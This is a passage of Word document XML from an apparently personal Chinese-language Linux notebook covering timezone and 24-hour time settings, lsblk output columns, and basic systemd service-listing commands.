      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="238" w:name="_Toc159779698"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不重启调整</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>小时格式为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>小时格式</w:t>
      </w:r>
      <w:r w:rsidR="00913889">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：暂没找到这种</w:t>
      </w:r>
      <w:bookmarkEnd w:id="238"/>
    </w:p>
    <w:p w14:paraId="2D7ABC0D" w14:textId="77777777" w:rsidR="00077E19" w:rsidRDefault="00077E19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15A1C1AA" w14:textId="77777777" w:rsidR="007603E7" w:rsidRDefault="007603E7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00126429">
        <w:t>https://blog.csdn.net/JackMaF/article/details/119881478</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798F5013" w14:textId="77777777" w:rsidR="007603E7" w:rsidRDefault="007603E7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09FFE763" w14:textId="77777777" w:rsidR="007603E7" w:rsidRDefault="007603E7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="000317A5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>方法一</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395C6575" w14:textId="77777777" w:rsidR="007603E7" w:rsidRPr="00304FFF" w:rsidRDefault="007603E7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00304FFF">
        <w:t>cp   /usr/share/zoneinfo/Asia/Shanghai    /etc/localtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28ACFE97" w14:textId="77777777" w:rsidR="007603E7" w:rsidRDefault="007603E7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FAFAC78" w14:textId="77777777" w:rsidR="007603E7" w:rsidRDefault="007603E7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="000317A5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>方法二</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61782141" w14:textId="77777777" w:rsidR="007603E7" w:rsidRPr="00017687" w:rsidRDefault="007603E7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00017687">
        <w:t>timedatectl   set-timezone   Asia/Shanghai</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A09427" w14:textId="77777777" w:rsidR="007603E7" w:rsidRDefault="007603E7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23607855" w14:textId="77777777" w:rsidR="007603E7" w:rsidRPr="00304FFF" w:rsidRDefault="007603E7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00017687">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>最后修改时间格式：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F51864" w14:textId="77777777" w:rsidR="007603E7" w:rsidRDefault="007603E7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>需要修改时间为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>24</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>小时，可以修改</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/etc/default/locale</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，默认没有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LC_TIME</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个变量，在文件中增加一行：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B5810E" w14:textId="77777777" w:rsidR="007603E7" w:rsidRDefault="007603E7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>LC_TIME=en_DK.UTF-8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2524CFED" w14:textId="77777777" w:rsidR="007603E7" w:rsidRDefault="007603E7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="104988C6" w14:textId="77777777" w:rsidR="007603E7" w:rsidRDefault="007603E7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后重启，就可以看到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>小时制了，如</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7010C6F4" w14:textId="77777777" w:rsidR="007603E7" w:rsidRDefault="007603E7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00B508C5">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Thu Apr 13 14:47:03 CST 2023</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EAD733A" w14:textId="77777777" w:rsidR="007603E7" w:rsidRDefault="007603E7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3508BF9C" w14:textId="77777777" w:rsidR="00077E19" w:rsidRDefault="00077E19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="714DC1B1" w14:textId="77777777" w:rsidR="00077E19" w:rsidRDefault="00077E19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30097EB8" w14:textId="77777777" w:rsidR="00077E19" w:rsidRDefault="00077E19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32726B1A" w14:textId="77777777" w:rsidR="00077E19" w:rsidRPr="00077E19" w:rsidRDefault="00077E19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="601435F5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="239" w:name="_Toc159779699"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>列出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的块设备：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lsblk</w:t>
      </w:r>
      <w:bookmarkEnd w:id="239"/>
    </w:p>
    <w:p w14:paraId="0266E2C8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://www.php.cn/linux-486900.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4016BFEA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67CC8C87" w14:textId="2D37F933" w:rsidR="00096D81" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lsblk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3486F9A6" w14:textId="575FF16B" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以看到所有的块设备属性</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BD7230" w14:textId="7CD24685" w:rsidR="00096D81" w:rsidRDefault="00096D81" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29E8472A" w14:textId="134E98D5" w:rsidR="00096D81" w:rsidRDefault="00096D81" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通常</w:t>
      </w:r>
      <w:r w:rsidR="00B80EC5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidR="00681E7E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>按住、重装系统的时候</w:t>
      </w:r>
      <w:r w:rsidR="00EC06C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，结合</w:t>
      </w:r>
      <w:r w:rsidR="00EC06C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidR="00EC06C3">
        <w:t>sblk</w:t>
      </w:r>
      <w:r w:rsidR="00EC06C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidR="00EC06C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidR="00EC06C3">
        <w:t>disk</w:t>
      </w:r>
      <w:r w:rsidR="00EC06C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来对</w:t>
      </w:r>
      <w:r w:rsidR="00EC06C3">
        <w:t>/dev/sda</w:t>
      </w:r>
      <w:r w:rsidR="00EC06C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidR="00EC06C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00EC06C3">
        <w:t>dev/sdb</w:t>
      </w:r>
      <w:r w:rsidR="00EC06C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的整块的磁盘</w:t>
      </w:r>
      <w:r w:rsidR="008512A1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行操作。</w:t>
      </w:r>
      <w:r w:rsidR="0080512F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
      <w:r w:rsidR="0080512F">
        <w:t>blk</w:t>
      </w:r>
      <w:r w:rsidR="00D61174">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以很直观的看到整块磁盘有没有分了区。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B807D80" w14:textId="2B5B559E" w:rsidR="000F44BB" w:rsidRDefault="000F44BB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69F05820" w14:textId="4471B9A3" w:rsidR="000F44BB" w:rsidRDefault="000F44BB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59EB7F46" w14:textId="77777777" w:rsidR="000F44BB" w:rsidRDefault="000F44BB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="392421BB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="4C40D2B5" wp14:editId="6DE04CE2">
            <wp:extent cx="5161915" cy="4062095"/>
            <wp:effectExtent l="0" t="0" r="4445" b="6985"/>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76"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5161915" cy="4062095"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2EE743" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>七个栏目名称如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346AD77F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01D9FB08" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">NAME </w:t>
      </w:r>
      <w:r>
        <w:t>：这是块设备名。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228017DB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">MAJ:MIN </w:t>
      </w:r>
      <w:r>
        <w:t>：本栏显示主要和次要设备号。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271FFE03" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">RM </w:t>
      </w:r>
      <w:r>
        <w:t>：本栏显示设备是否可移动设备。注意，在本例中设备</w:t>
      </w:r>
      <w:r>
        <w:t>sdb</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>sr0</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>RM</w:t>
      </w:r>
      <w:r>
        <w:t>值等于</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>，这说明他们是可移动设备。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11606E38" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SIZE </w:t>
      </w:r>
      <w:r>
        <w:t>：本栏列出设备的容量大小信息。例如</w:t>
      </w:r>
      <w:r>
        <w:t>298.1G</w:t>
      </w:r>
      <w:r>
        <w:t>表明该设备大小为</w:t>
      </w:r>
      <w:r>
        <w:t>298.1GB</w:t>
      </w:r>
      <w:r>
        <w:t>，而</w:t>
      </w:r>
      <w:r>
        <w:t>1K</w:t>
      </w:r>
      <w:r>
        <w:t>表明该设备大小为</w:t>
      </w:r>
      <w:r>
        <w:t>1KB</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B710581" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">RO </w:t>
      </w:r>
      <w:r>
        <w:t>：该项表明设备是否为只读。在本案例中，所有设备的</w:t>
      </w:r>
      <w:r>
        <w:t>RO</w:t>
      </w:r>
      <w:r>
        <w:t>值为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>，表明他们不是只读的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79ECF150" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">TYPE </w:t>
      </w:r>
      <w:r>
        <w:t>：本栏显示块设备是否是磁盘或磁盘上的一个分区。在本例中，</w:t>
      </w:r>
      <w:r>
        <w:t>sda</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>sdb</w:t>
      </w:r>
      <w:r>
        <w:t>是磁盘，而</w:t>
      </w:r>
      <w:r>
        <w:t>sr0</w:t>
      </w:r>
      <w:r>
        <w:t>是只读存储（</w:t>
      </w:r>
      <w:r>
        <w:t>rom</w:t>
      </w:r>
      <w:r>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F286E5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">MOUNTPOINT </w:t>
      </w:r>
      <w:r>
        <w:t>：本栏指出设备挂载的挂载点。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202DCA59" w14:textId="4E89653F" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="520CC186" w14:textId="765E94A6" w:rsidR="00C21CCC" w:rsidRDefault="00C21CCC" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="240" w:name="_Toc159779700"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看日志</w:t>
      </w:r>
      <w:bookmarkEnd w:id="240"/>
    </w:p>
    <w:p w14:paraId="257993E0" w14:textId="705C7B5B" w:rsidR="00C21CCC" w:rsidRDefault="00C21CCC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26F55230" w14:textId="2C5EC64B" w:rsidR="006A4E3B" w:rsidRDefault="006A4E3B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AE9F054" w14:textId="77777777" w:rsidR="006A4E3B" w:rsidRDefault="006A4E3B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F6046A7" w14:textId="77777777" w:rsidR="00F80DE5" w:rsidRDefault="008428BC" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="241" w:name="_Toc159779701"/>
      <w:r>
        <w:t>journalctl:</w:t>
      </w:r>
      <w:r w:rsidR="00F80DE5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看</w:t>
      </w:r>
      <w:r w:rsidR="00F80DE5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>systemd</w:t>
      </w:r>
      <w:r w:rsidR="00F80DE5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>日志</w:t>
      </w:r>
      <w:bookmarkEnd w:id="241"/>
    </w:p>
    <w:p w14:paraId="6E919076" w14:textId="365EFB17" w:rsidR="00F80DE5" w:rsidRDefault="00F80DE5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74D37559" w14:textId="71C3754A" w:rsidR="009047A1" w:rsidRDefault="009047A1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看所有服务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CADEDA8" w14:textId="78742E13" w:rsidR="009047A1" w:rsidRDefault="009047A1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="009047A1">
        <w:t>service --status-all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CE41AF" w14:textId="77777777" w:rsidR="009047A1" w:rsidRDefault="009047A1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36973554" w14:textId="532888E3" w:rsidR="006A4E3B" w:rsidRDefault="006A4E3B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看正在运行的服务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC97C9D" w14:textId="1F5F1ABF" w:rsidR="006A4E3B" w:rsidRDefault="006A4E3B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="006A4E3B">
        <w:t>systemctl | grep running</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E91C803" w14:textId="2C3E3830" w:rsidR="006D5283" w:rsidRDefault="006D5283" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69FE4F32" w14:textId="301341EC" w:rsidR="006D5283" w:rsidRDefault="006D5283" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看开机自启的服务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0FA6CD" w14:textId="02DE7BC0" w:rsidR="006D5283" w:rsidRDefault="006D5283" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="006D5283">
        <w:t>chkconfig --list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15165990" w14:textId="528C4BB3" w:rsidR="006A4E3B" w:rsidRDefault="006A4E3B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B40ED5D" w14:textId="687BDF4F" w:rsidR="00777A6C" w:rsidRDefault="00777A6C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00777A6C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据类型列出单元</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02782269" w14:textId="377EE0D7" w:rsidR="006A4E3B" w:rsidRDefault="00034B81" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00034B81">
        <w:t>systemctl list-units --type service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E42813F" w14:textId="3EBCC955" w:rsidR="00034B81" w:rsidRDefault="00DA3B4D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DA3B4D">
        <w:t>systemctl list-unit-files --type service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F1706A" w14:textId="3E7288F8" w:rsidR="00034B81" w:rsidRDefault="00034B81" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AFD72AD" w14:textId="782535DB" w:rsidR="00034B81" w:rsidRDefault="00034B81" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="468FF8B0" w14:textId="1C444198" w:rsidR="00034B81" w:rsidRDefault="00034B81" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01952CE7" w14:textId="77777777" w:rsidR="00034B81" w:rsidRDefault="00034B81" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DE63A5A" w14:textId="75B7E95F" w:rsidR="008428BC" w:rsidRDefault="004B08FE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="004B08FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一些最引人注目的优势</w:t>
      </w:r>
      <w:r w:rsidRPr="00E457FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>systemd</w:t>
      </w:r>
      <w:r w:rsidRPr="00E457FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>是那些参与到流程和系统日志</w:t>
      </w:r>
      <w:r w:rsidRPr="004B08FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="004B08FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004B08FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当使用其它工具，日志通常分散在整个系统中，由不同的守护程序和进程的处理，并且可以是相当困难的，当它们跨越多个应用来解释。</w:t>
      </w:r>
      <w:r w:rsidRPr="004B08FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Systemd</w:t>
      </w:r>
      <w:r w:rsidRPr="004B08FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
